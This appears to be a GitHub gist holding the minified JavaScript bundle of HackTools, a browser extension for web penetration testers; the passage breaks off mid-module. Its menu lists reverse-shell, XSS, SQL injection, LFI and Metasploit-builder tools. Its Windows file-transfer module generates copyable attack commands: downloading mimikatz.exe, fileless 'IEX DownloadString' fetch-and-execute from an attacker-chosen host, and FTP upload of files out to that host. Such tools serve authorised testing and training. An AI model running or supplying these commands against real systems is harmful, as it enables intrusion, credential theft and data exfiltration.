Skip to content

Instantly share code, notes, and snippets.

@opexxx
Created April 12, 2025 09:29
Show Gist options
  • Save opexxx/047f8453e19cfe02491abf08086c2e49 to your computer and use it in GitHub Desktop.
Save opexxx/047f8453e19cfe02491abf08086c2e49 to your computer and use it in GitHub Desktop.
app.bundle.js
!function(){var e,t,l,a,n,r={38127:function(e,t,l){"use strict";l.r(t);var a=l(34846),n=l.n(a),r=l(50009),i=l.n(r)()(n());i.push([e.id,".logo:hover {\r\n cursor: pointer;\r\n animation: jelly 0.5s;\r\n}\r\n\r\n.logo {\r\n padding-left: 17px;\r\n padding-top: 14px;\r\n margin-bottom: 10px;\r\n}\r\n\r\n@keyframes jelly {\r\n\r\n 0%,\r\n 100% {\r\n transform: scale(1, 1);\r\n }\r\n\r\n 25% {\r\n transform: scale(0.9, 1.1);\r\n }\r\n\r\n 50% {\r\n transform: scale(1.1, 0.9);\r\n }\r\n\r\n 75% {\r\n transform: scale(0.95, 1.05);\r\n }\r\n}\r\n\r\n.ant-badge {\r\n color: inherit !important;\r\n}\r\n\r\n.site-layout .site-layout-background {\r\n border-radius: 10px;\r\n}\r\n\r\n.ant-menu-inline .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-left .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-right .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical .ant-menu-item:not(:last-child) {\r\n margin: 0px !important;\r\n}\r\n\r\n.ant-menu-dark.ant-menu-inline .ant-menu-item,\r\n.ant-menu-dark.ant-menu-vertical .ant-menu-item,\r\n.ant-menu-dark.ant-menu-vertical-left .ant-menu-item,\r\n.ant-menu-dark.ant-menu-vertical-right .ant-menu-item {\r\n left: 4px !important;\r\n margin-left: 0 !important;\r\n border-right: 0 !important;\r\n}\r\n\r\n.ant-menu-vertical .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-left .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-right .ant-menu-item:not(:last-child),\r\n.ant-menu-inline .ant-menu-item:not(:last-child) {\r\n margin: 0 !important;\r\n}\r\n\r\n.ant-menu-inline-collapsed>.ant-menu-item,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-item,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-inline-collapsed>.ant-menu-submenu>.ant-menu-submenu-title {\r\n left: 0 !important;\r\n padding: 2px calc(50% - 25px / 2) !important;\r\n text-overflow: clip !important;\r\n}\r\n\r\n.ant-menu-vertical>.ant-menu-item,\r\n.ant-menu-vertical-left>.ant-menu-item,\r\n.ant-menu-vertical-right>.ant-menu-item,\r\n.ant-menu-inline>.ant-menu-item,\r\n.ant-menu-vertical>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-vertical-left>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-vertical-right>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-inline>.ant-menu-submenu>.ant-menu-submenu-title {\r\n height: 35px !important;\r\n line-height: 35px !important;\r\n}\r\n\r\n.ant-menu-inline-collapsed>.ant-menu-item .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-item .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-submenu>.ant-menu-submenu-title .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-submenu>.ant-menu-submenu-title .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-item .anticon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-item .anticon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-submenu>.ant-menu-submenu-title .anticon,\r\n.ant-menu-inline-collapsed>.ant-menu-submenu>.ant-menu-submenu-title .anticon {\r\n margin: 0 !important;\r\n font-size: 18px !important;\r\n line-height: 32px !important;\r\n}\r\n\r\n.iconfont {\r\n font-family: \"iconfont\";\r\n margin: 0;\r\n font-size: 14px;\r\n line-height: 32px;\r\n font-style: normal;\r\n -webkit-font-smoothing: antialiased;\r\n -moz-osx-font-smoothing: grayscale;\r\n}\r\n\r\nbody {\r\n min-width: 750px;\r\n min-height: auto;\r\n margin: 0px !important;\r\n font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;\r\n font-size: 14px;\r\n}",""]),t.default=i},87231:function(e,t,l){"use strict";l.r(t);var a=l(54157),n=l.n(a),r=l(14451),i=l.n(r),o=l(66785),c=l.n(o),u=l(57051),s=l.n(u),d=l(53317),p=l.n(d),m=l(71557),f=l.n(m),v=l(38127),h={};h.styleTagTransform=f(),h.setAttributes=s(),h.insert=c().bind(null,"head"),h.domAPI=i(),h.insertStyleElement=p();var _=n()(v.default,h);if(!v.default.locals||e.hot.invalidate){var g=!v.default.locals,y=g?v:v.default.locals;e.hot.accept(38127,function(t){v=l(38127),function(e,t,l){if(!e&&t||e&&!t)return!1;var a;for(a in e)if((!l||"default"!==a)&&e[a]!==t[a])return!1;for(a in t)if(!(l&&"default"===a||e[a]))return!1;return!0}(y,g?v:v.default.locals,g)?(y=g?v:v.default.locals,_(v.default)):e.hot.invalidate()}.bind(this))}e.hot.dispose((function(){_()})),t.default=v.default&&v.default.locals?v.default.locals:void 0},97752:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=a(l(85868)),i=l(28620),o=l(35401),c=l(1759),u=a(l(74505)),s=a(l(38075));l(87231);const d=new c.QueryClient;r.default.render(n.default.createElement(c.QueryClientProvider,{client:d},n.default.createElement(u.default,null,n.default.createElement(i.Router,null,n.default.createElement((()=>n.default.createElement("div",null,n.default.createElement(s.default,null))),null)),n.default.createElement(o.FloatButton.BackTop,null))),document.getElementById("app"))},51250:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),{Title:i,Paragraph:o,Link:c}=r.Typography;t.default=function(){return n.default.createElement("div",null,n.default.createElement(i,{level:2,style:{fontWeight:"bold",margin:15}},"About us"),n.default.createElement(o,{style:{margin:15}},"Our story of two students creating this app"),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(o,null,"HackTools, is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells and much more. With the extension you no longer need to search for payloads in different websites or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in pop up mode or in a whole tab in the Devtools part of the browser with F12."),n.default.createElement(o,null,"Note that this project is maintained, developed and made available for free, you can offer us a coffee, it will be very encouraging and greatly appreciated"),n.default.createElement(o,null,"HackTools is created by Ludovic COULON and Riadh BOUCHAHOUA"),n.default.createElement("a",{href:"https://www.paypal.com/paypalme/hacktoolsEXT",target:"_blank",rel:"noreferrer noopener"},n.default.createElement("img",{src:"https://paymentweek.com/wp-content/uploads/2014/09/paypal-copy-1024x489.png",alt:"Paypal",style:{height:"50px",width:"auto"}}))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(i,{level:3},"Contribute"),n.default.createElement(o,null,"We are always looking for community input into our software. Feel free to contribute to the Hack-Tools repository:"),n.default.createElement(o,null,"- Contribute the project: ",n.default.createElement(c,{href:"https://github.com/LasCC/Hack-Tools",target:"_blank"},"https://github.com/LasCC/Hack-Tools")),n.default.createElement(o,{strong:!0},"Before submitting a bug report"),n.default.createElement(o,null,"Check the open issues, to see if the problem is already reported."),n.default.createElement(o,null,"If you encounter a problem that was reported and closed, check why it was closed and if you think it should be reopened, open a new issue instead."),n.default.createElement(o,null,"- Report a bug: ",n.default.createElement(c,{href:"https://github.com/LasCC/Hack-Tools/issues",target:"_blank"},"https://github.com/LasCC/Hack-Tools/issues"))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"c",style:{padding:15,marginTop:15}},n.default.createElement(i,{level:3}," Credits ")," ",n.default.createElement(o,null," PentestMonkey "),n.default.createElement(o,null," GTFOBins ")," ",n.default.createElement(o,null," Antd ")," ",n.default.createElement(o,null," Iconfont CN "),n.default.createElement(o,null," John Hammond ")," ",n.default.createElement(o,null," The Noun Project "),n.default.createElement(o,null," PayloadsAllTheThings "),n.default.createElement(o,null," Fabien LOISON(flozz) for the p0wny @shell "),n.default.createElement(o,null," GoProSlowYo for the zsh reverse shell "),n.default.createElement(o,null," MITRE ATT&CK "),n.default.createElement(o,null," Thanks to dejisec for the Active Directory scripts ! ",n.default.createElement(c,{href:"https://gist.github.com/dejisec/3477eff3258f1f43fc3c57de56295f34",target:"_blank"},"Link")," ")))}},74505:function(e,t,l){"use strict";var a=this&&this.__createBinding||(Object.create?function(e,t,l,a){void 0===a&&(a=l);var n=Object.getOwnPropertyDescriptor(t,l);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[l]}}),Object.defineProperty(e,a,n)}:function(e,t,l,a){void 0===a&&(a=l),e[a]=t[l]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),r=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var l in e)"default"!==l&&Object.prototype.hasOwnProperty.call(e,l)&&a(t,e,l);return n(t,e),t},i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const o=r(l(50959)),c=l(35401),u=l(73706),s=l(73706),d=l(28620),p=i(l(38075)),m=i(l(28505)),f=i(l(88013)),v=i(l(48329)),h=i(l(61363)),_=i(l(54416)),g=i(l(74082)),y=i(l(97989)),E=i(l(36865)),b=i(l(55099)),w=i(l(51250)),x=i(l(45386)),k=i(l(16139)),S=i(l(31529)),C=i(l(42546)),T=i(l(62597)),$=i(l(12650)),{Paragraph:O}=c.Typography,{Sider:P,Content:D,Footer:j}=c.Layout,L=(0,s.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=function(e){const{defaultAlgorithm:t,darkAlgorithm:l}=c.theme,a=(0,S.default)("dark_mode"),[n,r]=a(!1),i=[{key:"1",icon:o.default.createElement(L,{type:"icon-gnubash",style:{fontSize:"1.5em",marginTop:3}}),name:"Reverse Shell",componentRoute:p.default},{key:"2",icon:o.default.createElement(L,{type:"icon-php",style:{fontSize:"1.5em",marginTop:3}}),name:"PHP Reverse Shell",componentRoute:m.default},{key:"3",icon:o.default.createElement(L,{type:"icon-lvzhou_yuanchengTelnet",style:{fontSize:"1.5em",marginTop:3}}),name:"TTY Spawn Shell",componentRoute:f.default},{key:"4",icon:o.default.createElement(L,{type:"icon-linux",style:{fontSize:"1.5em",marginTop:3}}),name:"Useful Linux commands",componentRoute:_.default},{key:"5",icon:o.default.createElement(L,{type:"icon-powershell",style:{fontSize:"1.5em",marginTop:3}}),name:"PowerShell Commands",componentRoute:g.default},{key:"6",icon:o.default.createElement(L,{type:"icon-transfer",style:{fontSize:"1.5em",marginTop:3}}),name:"Transfer Methods",componentRoute:k.default},{key:"7",icon:o.default.createElement(L,{type:"icon-l-file",style:{fontSize:"1.5em",marginTop:3}}),name:"LFI",componentRoute:y.default},{key:"8",icon:o.default.createElement(L,{type:"icon-js",style:{fontSize:"1.5em",marginTop:3}}),name:"XSS",componentRoute:E.default},{key:"9",icon:o.default.createElement(L,{type:"icon-sql",style:{fontSize:"1.5em",marginTop:3}}),name:"SQL Injection",componentRoute:b.default},{key:"10",icon:o.default.createElement(L,{type:"icon-jiemaleixing",style:{fontSize:"1.5em",marginTop:3}}),name:"Data Encoding",componentRoute:v.default},{key:"11",icon:o.default.createElement(L,{type:"icon-Encode-File",style:{fontSize:"1.5em",marginTop:3}}),name:"Obfuscated Files or Information",componentRoute:T.default},{key:"12",icon:o.default.createElement(L,{type:"icon-hash",style:{fontSize:"1.5em",marginTop:3}}),name:"Hashing",componentRoute:h.default},{key:"13",icon:o.default.createElement(L,{type:"icon-Cloud",style:{fontSize:"1.5em",marginTop:3}}),name:"Feed RSS",componentRoute:x.default},{key:"14",icon:o.default.createElement(L,{type:"icon-shield",style:{fontSize:"1.5em",marginTop:3}}),name:"MSF Builder",componentRoute:C.default},{key:"15",icon:o.default.createElement(L,{type:"icon-about",style:{fontSize:"1.5em",marginTop:3}}),name:"About us",componentRoute:w.default}],s=i.map((e=>o.default.createElement(c.Menu.Item,{style:{overflow:"hidden"},key:e.key,icon:e.icon,onClick:()=>B(e)},e.name))),I=(0,S.default)("tab_index_cache"),[R,N]=I("1"),B=({componentRoute:e,key:t})=>{(0,d.goTo)(e),N(t)};(0,o.useEffect)((()=>{const e=i.filter((e=>e.key===R))[0].componentRoute;(0,d.goTo)(e)}),[]);const A=window.location.href;return o.default.createElement(c.ConfigProvider,{theme:{token:{wireframe:!0},algorithm:n?l:t}},o.default.createElement(c.Layout,{style:{minHeight:"100vh"}},o.default.createElement(P,{collapsed:!0,style:{overflow:"auto",height:"100vh",position:"fixed",left:0}},o.default.createElement("div",{className:"logo",onClick:()=>{const e={key:"1",name:"Hat Clicked",componentRoute:$.default};B(e)}},o.default.createElement("svg",{xmlns:"http://www.w3.org/2000/svg",width:"45",height:"35",viewBox:"0 0 134.624 80.584"},o.default.createElement("g",{transform:"translate(-6.457 -23.8)"},o.default.createElement("path",{d:"M138.715,62.377c-9.043-1.871-15.592.78-21.673,4.989l-5.616-26.958-2.18-10.463a1.432,1.432,0,0,0-.624-.936c-.312-.156-6.86-4.21-32.431-4.21s-34.458,4.678-34.77,4.834c-.468.312-.78.624-.78,1.091L36.9,57.543c-4.678,0-19.022.624-26.039,9.2C7.119,71.264,6.651,78.125,9.3,84.829c4.054,9.979,14.033,16.839,26.506,18.087a80.594,80.594,0,0,0,8.42.468c21.985,0,40.071-8.887,52.389-16.06,1.559-.468,11.538-3.274,24.635-8.42,14.812-5.769,18.554-14.033,18.71-14.5a2.163,2.163,0,0,0,0-1.4C139.495,62.689,139.183,62.377,138.715,62.377ZM43.448,32.128c2.495-1.091,11.694-4.21,32.743-4.21,20.581,0,28.377,2.651,30.248,3.43L111.585,56.3a165.118,165.118,0,0,1-40.851,8.887C51.088,66.9,41.733,63,39.238,61.6ZM95.058,84.517c-13.409,7.8-33.991,17.931-59.094,15.436-11.382-1.247-20.27-7.328-24.012-16.216-2.183-5.613-1.871-11.382,1.091-14.968,5.925-7.328,18.554-8.108,23.232-8.108L34.249,74.694a1.367,1.367,0,0,0,.78,1.559c9.979,6.081,21.049,8.264,31.5,8.264,16.216,0,31.34-5.145,40.7-9.043A85,85,0,0,1,95.058,84.517ZM120,75.942C114.236,78.125,109.091,80,104.881,81.4c2.183-1.715,4.054-3.43,6.081-5.145,7.172-6.237,13.1-11.382,21.829-11.382a19.881,19.881,0,0,1,2.962.156C134.038,67.522,129.516,72.356,120,75.942Z",transform:"translate(0 0)",fill:"#F0F2F5",stroke:"#F0F2F5",strokeWidth:"2"})))),o.default.createElement(c.Menu,{theme:"dark",defaultSelectedKeys:[R],mode:"inline"},s)),o.default.createElement(c.Layout,{className:"site-layout",style:{marginLeft:80}},o.default.createElement(D,{style:{margin:"24px 16px 0",overflow:"initial",minHeight:360,padding:14,borderRadius:8,background:n?"#0f0f0f":"#fff"}},e.children),o.default.createElement(j,{style:{textAlign:"center"}},o.default.createElement(u.CopyrightCircleOutlined,null)," Hack Tools - The all in one Red team browser extension for web pentesters",o.default.createElement(O,{style:{textAlign:"center"}},"Ludovic COULON - Riadh BOUCHAHOUA"),o.default.createElement("pre",{style:{textAlign:"center"}},"HackTools Version - 0.5.0"),o.default.createElement(c.Button,{icon:o.default.createElement(u.FullscreenOutlined,{style:{margin:5}}),type:"link"},o.default.createElement("a",{href:A,rel:"noreferrer noopener",target:"_blank"},"Fullscreen mode")),o.default.createElement(c.Select,{defaultValue:n?"dark":"light",style:{width:150},onChange:e=>{r("dark"===e)},options:[{value:"light",label:"Light"},{value:"dark",label:"Dark"}]}),o.default.createElement(c.Button,{icon:o.default.createElement(u.ArrowsAltOutlined,{style:{margin:5}}),onClick:()=>{chrome.windows.create({url:chrome.runtime.getURL("index.html"),width:1100,height:800,type:"popup"})},type:"link"},"Pop-up mode")))))}},48329:function(e,t,l){"use strict";var a=this&&this.__createBinding||(Object.create?function(e,t,l,a){void 0===a&&(a=l);var n=Object.getOwnPropertyDescriptor(t,l);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[l]}}),Object.defineProperty(e,a,n)}:function(e,t,l,a){void 0===a&&(a=l),e[a]=t[l]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),r=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var l in e)"default"!==l&&Object.prototype.hasOwnProperty.call(e,l)&&a(t,e,l);return n(t,e),t},i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const o=r(l(50959)),c=l(35401),u=l(73706),s=i(l(17911)),d=i(l(17136)),{Title:p,Paragraph:m}=c.Typography,f=(0,u.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=()=>{const[e,t]=(0,o.useState)(""),[l,a]=(0,o.useState)(""),{TextArea:n}=c.Input,r=t=>{let l,n;switch(t){case"encode":switch(i){case"base64":l=btoa(e);break;case"uri":try{l=encodeURI(e)}catch(e){n="Incorrect format, please try something else."}break;case"hex":try{l=function(e){for(var t="",l=0;l<e.length;l++){var a=e.charCodeAt(l).toString(16).toUpperCase();1===a.length&&(a="0"+a),t+=a}return t}(e)}catch(e){n="Incorrect Hex, please try something else."}}break;case"decode":switch(i){case"base64":try{l=atob(e)}catch(e){n="Incorrect Base64, please try something else."}break;case"uri":try{l=decodeURI(e)}catch(e){n="Incorrect URI, please try something else."}break;case"hex":try{l=function(e){for(var t="",l=0;l<e.length;l+=2){var a=parseInt(e.substr(l,2),16);isNaN(a)||(t+=String.fromCharCode(a))}return t}(e)}catch(e){n="Incorrect hexadecimal, please try something else."}}}a(n?"Unable to decode properly: "+n:l),n&&c.message.error(n)},[i,v]=(0,o.useState)("base64"),h=o.default.createElement(c.Menu,{onClick:e=>{v(e.key.toString())}},o.default.createElement(c.Menu.Item,{key:"base64"},"Base64"),o.default.createElement(c.Menu.Divider,null),o.default.createElement(c.Menu.Item,{key:"uri"},"URI"),o.default.createElement(c.Menu.Divider,null),o.default.createElement(c.Menu.Item,{key:"hex"},"Hexadecimal"));return o.default.createElement("div",null,o.default.createElement("div",{style:{margin:15}},o.default.createElement(p,{level:2,style:{fontWeight:"bold"}},"Data Encoding"),o.default.createElement(m,null,"Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.")),o.default.createElement(c.Divider,{dashed:!0}),o.default.createElement("div",{key:"a",style:{marginTop:15,marginLeft:15}},o.default.createElement(n,{rows:4,value:e,onChange:e=>{t(e.target.value)},placeholder:"Some Base64 or ASCII Text to Encode / Decode / Quote escape..."}),o.default.createElement(c.Dropdown,{overlay:h},o.default.createElement("a",{className:"ant-dropdown-link"},i," ",o.default.createElement(u.DownOutlined,{style:{padding:10}}))),o.default.createElement(c.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>r("encode")},o.default.createElement(f,{type:"icon-lock"}),"Encode"),o.default.createElement(c.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:()=>r("decode")},o.default.createElement(f,{type:"icon-lock-open"}),"Decode"),o.default.createElement(c.Button,{type:"text",style:{marginBottom:10,marginTop:15,marginLeft:8},onClick:()=>{a((0,d.default)(e))}},o.default.createElement(f,{type:"icon-lock-open"}),"Quote escape")),o.default.createElement("div",{key:"b",style:{marginTop:15,marginLeft:15}},o.default.createElement(n,{rows:4,value:l,style:{cursor:"auto",marginTop:15,color:"#777"},placeholder:"The results will appear here"}),o.default.createElement(s.default,{component:"a","data-clipboard-text":l},o.default.createElement(c.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{c.message.success("Your payload has been copied successfully !")}},o.default.createElement(u.CopyOutlined,null)," Copy")),o.default.createElement(c.Button,{type:"link",danger:!0,style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:()=>a("")},o.default.createElement(u.ClearOutlined,null)," Clear")))}},61363:function(e,t,l){"use strict";var a=this&&this.__createBinding||(Object.create?function(e,t,l,a){void 0===a&&(a=l);var n=Object.getOwnPropertyDescriptor(t,l);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[l]}}),Object.defineProperty(e,a,n)}:function(e,t,l,a){void 0===a&&(a=l),e[a]=t[l]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),r=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var l in e)"default"!==l&&Object.prototype.hasOwnProperty.call(e,l)&&a(t,e,l);return n(t,e),t},i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const o=r(l(50959)),c=l(35401),u=l(73706),s=i(l(47899)),d=i(l(7987)),p=i(l(93881)),m=i(l(51185)),f=i(l(43065)),v=i(l(17911)),{Title:h,Paragraph:_,Text:g}=c.Typography,{TextArea:y}=c.Input,E=(0,u.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=()=>{const[e,t]=(0,o.useState)(""),[l,a]=(0,o.useState)("0"),[n,r]=(0,o.useState)("MD5"),[i,b]=(0,o.useState)(""),w=t=>{let l;switch(t){case"MD5":l=(0,s.default)(e,void 0).toString();break;case"SHA1":l=(0,d.default)(e,void 0).toString();break;case"SHA256":l=(0,p.default)(e,void 0).toString();break;case"SHA512":l=(0,m.default)(e,void 0).toString();break;case"SM3":l=(0,f.default)(e);break;default:l=""}b(l)},x=o.default.createElement(c.Menu,{onClick:e=>{a(e.key),(e=>{switch(e){case"0":r("MD5");break;case"1":r("SHA1");break;case"2":r("SHA256");break;case"3":r("SHA512");break;case"4":r("SM3")}})(e.key)}},o.default.createElement(c.Menu.Item,{key:"0",onClick:()=>w("MD5")},"MD5"),o.default.createElement(c.Menu.Divider,null),o.default.createElement(c.Menu.Item,{key:"1",onClick:()=>w("SHA1")},"SHA1"),o.default.createElement(c.Menu.Item,{key:"2",onClick:()=>w("SHA256")},"SHA256"),o.default.createElement(c.Menu.Item,{key:"3",onClick:()=>w("SHA512")},"SHA512"),o.default.createElement(c.Menu.Item,{key:"4",onClick:()=>w("SM3")},"SM3"));return o.default.createElement("div",null,o.default.createElement(h,{level:2,style:{fontWeight:"bold",margin:15}},"Hash generator"),o.default.createElement(_,{style:{margin:15}},"A hash function is any function that can be used to map data of arbitrary size to fixed-size values. The values returned by a hash function are called hash values, hash codes, digests, or simply hashes."),o.default.createElement(c.Divider,{dashed:!0}),o.default.createElement("div",{key:"a",style:{margin:15}},o.default.createElement(y,{rows:4,value:e,onChange:e=>{t(e.target.value)},placeholder:"Type something to hash (ex: mysecretpassword)"}),o.default.createElement(c.Dropdown,{overlay:x},o.default.createElement("a",{className:"ant-dropdown-link"},n," ",o.default.createElement(u.DownOutlined,{style:{padding:10}}))),o.default.createElement(c.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>w(n)},o.default.createElement(E,{type:"icon-hash"})," Get Hash")),o.default.createElement("div",{key:"b",style:{margin:15}},o.default.createElement(y,{rows:4,value:i,style:{cursor:"auto",marginTop:15,color:"#777"},placeholder:"The results will appear here"}),o.default.createElement("pre",null,o.default.createElement(g,null,"Cryptographic Hash Algorithm : ",n)),o.default.createElement(v.default,{component:"a","data-clipboard-text":i},o.default.createElement(c.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{c.message.success("Your hash has been copied successfully !")}},o.default.createElement(u.CopyOutlined,null)," Copy")),o.default.createElement(c.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:10}},o.default.createElement("a",{href:"https://crackstation.net/",target:"_blank",rel:"noopener noreferrer"},o.default.createElement(u.ArrowsAltOutlined,null)," Crack Station"))))}},16139:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=a(l(31529)),i=l(35401),o=l(73706),c=a(l(24417)),{Title:u,Paragraph:s,Text:d}=i.Typography,p=(0,o.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=function(){const e=(0,r.default)("ipv4_tcp_cache"),[t,l]=e({ip:"",port:"",target_file_name:"http://10.0.0.1/mimikatz.exe",output_file_name:"mimikatz.exe"}),a=e=>a=>{l(Object.assign(Object.assign({},t),{[e]:a.target.value}))},m=`(New-Object Net.WebClient).DownloadFile('${t.target_file_name}','${t.output_file_name}')`,f=`(New-Object Net.WebClient).DownloadFileAsync('${t.target_file_name}','${t.output_file_name}')`,v=`IEX (New-Object Net.WebClient).DownloadString('${t.target_file_name}')`,h=`(New-Object Net.WebClient).DownloadString('${t.target_file_name}') | IEX`,_=`iwr -Uri '${t.target_file_name}' -OutFile '${t.output_file_name}'`,g=`Invoke-WebRequest -Uri '${t.target_file_name}' -OutFile '${t.output_file_name}'`,y=`copy \\\\${t.ip}\\${t.output_file_name}`,E=`net use z: \\\\${t.ip}\\share /user:johnDoe Sup3rP@ssw0rd!`,b=`(New-Object System.Net.WebClient).DownloadFile('ftp://${t.ip}/${t.output_file_name}','${t.output_file_name}')`,w=`echo open ${t.ip} ${t.port} > ftp.txt\necho USER anonymous >> ftp.txt\necho GET ${t.output_file_name} >> ftp.txt\necho BYE >> ftp.txt\nftp -v -s:ftp.txt`,x=`(New-Object System.Net.WebClient).UploadFile('ftp://${t.ip}/${t.output_file_name}','C:\\Users\\Public\\${t.output_file_name}')`,k=`echo open ${t.ip} ${t.port} > ftp.txt\necho USER anonymous >> ftp.txt\necho binary >> ftp.txt\necho PUT ${t.output_file_name} >> ftp.txt\necho BYE >> ftp.txt\nftp -v -s:ftp.txt`;return n.default.createElement("div",null,n.default.createElement("div",null,n.default.createElement(u,{level:2,style:{fontWeight:"bold",margin:15}},"Windows File Transfer Methods"),n.default.createElement(s,{style:{margin:15}},"Over the past few years, the Windows operating system has evolved and new versions come with different utilities for file transfer operations. Understanding file transfer in Windows can be helpful to both attackers and defenders alike. Attackers can use various file transfer methods to operate and avoid being caught."),n.default.createElement("div",{style:{padding:15}},n.default.createElement(i.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},n.default.createElement(i.Col,{span:12},n.default.createElement(i.Input,{maxLength:15,prefix:n.default.createElement(o.WifiOutlined,null),name:"Ip adress",placeholder:"IP Address or domain (ex: 212.212.111.222)",onChange:a("ip"),value:t.ip})),n.default.createElement(i.Col,{span:12},n.default.createElement(i.Input,{maxLength:5,prefix:n.default.createElement(p,{type:"icon-Network-Plug"}),name:"Port",placeholder:"Port (ex: 1337)",onChange:a("port"),value:t.port}))),n.default.createElement(i.Row,{gutter:{xs:8,sm:16,md:24,lg:32},style:{marginTop:15}},n.default.createElement(i.Col,{span:12},n.default.createElement(i.Input,{prefix:n.default.createElement(o.FolderOutlined,null),name:"File name",placeholder:"URL (ex: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1)",onChange:a("target_file_name"),value:t.target_file_name})),n.default.createElement(i.Col,{span:12},n.default.createElement(i.Input,{prefix:n.default.createElement(o.FileDoneOutlined,null),name:"File name",placeholder:"Output file (ex: PowerView.ps1)",onChange:a("output_file_name"),value:t.output_file_name}))))),n.default.createElement(i.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i.Space,{direction:"vertical"},n.default.createElement(u,{level:3},"PowerShell Download File Method"),n.default.createElement(d,null,"We can specify the class name ",n.default.createElement(d,{keyboard:!0},"Net.WebClient")," and the method ",n.default.createElement(d,{keyboard:!0},"DownloadFile")," with the parameters corresponding to the URL of the target file to download and the output file name."),n.default.createElement(u,{level:4},"File Download"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},m))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},f))))),n.default.createElement(i.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i.Space,{direction:"vertical"},n.default.createElement(u,{level:3},"PowerShell DownloadString - Fileless Method"),n.default.createElement(d,null,"Fileless attacks work by using some operating system functions to download and execute the payloads. PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the ",n.default.createElement(d,{keyboard:!0},"Invoke-Expression")," command or the alias 